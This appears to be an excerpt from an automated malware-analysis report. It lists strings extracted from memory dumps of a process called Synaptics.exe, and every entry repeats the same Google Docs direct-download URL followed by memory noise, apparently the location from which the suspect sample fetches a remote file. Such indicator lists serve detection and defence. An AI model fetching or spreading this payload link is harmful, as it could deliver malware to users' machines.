                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..J
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..q
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador/pW
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador?tg
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorGq
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador_w
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloados
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoskp
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadostna
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadostna&
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadot
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadownl
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpO
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqc
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq~
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr)
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr4
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrC
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrm-Ve
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrver
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsOGlEI
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadscal
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsoq#e
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadspre9
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsq#
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadss
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstna
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstnam
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstnamS/
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstnams
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-CH
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtY$
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtche
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl/uW
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen$
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlenh
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni)
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni8
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtnam
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtname
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtop
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu(
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadusb.
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadut
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv5
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2994011286.000000001DA97000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw/
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwv?
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxO
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxred
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..&
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..C
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..e
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..l/
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz(
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz;
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzM
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadza
                          Source: Synaptics.exe, 00000003.00000002.3039603496.00000000321FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3003659996.00000000207FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3001082793.000000001E1BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008371816.000000002287E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3001340079.000000001E57E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3046708537.0000000033EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2982962884.000000001CD3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3050580435.0000000035F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2950241201.00000000093AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2941655126.000000000571E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3003057522.000000001FF3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3036562099.000000003017E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2964057797.000000000FF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2939542815.000000000440E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2950489416.000000000977E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009545460.00000000234FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2979292156.000000001A17E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3051952051.00000000367FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2967064575.0000000011BBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3053136487.000000003733E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~-
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~B
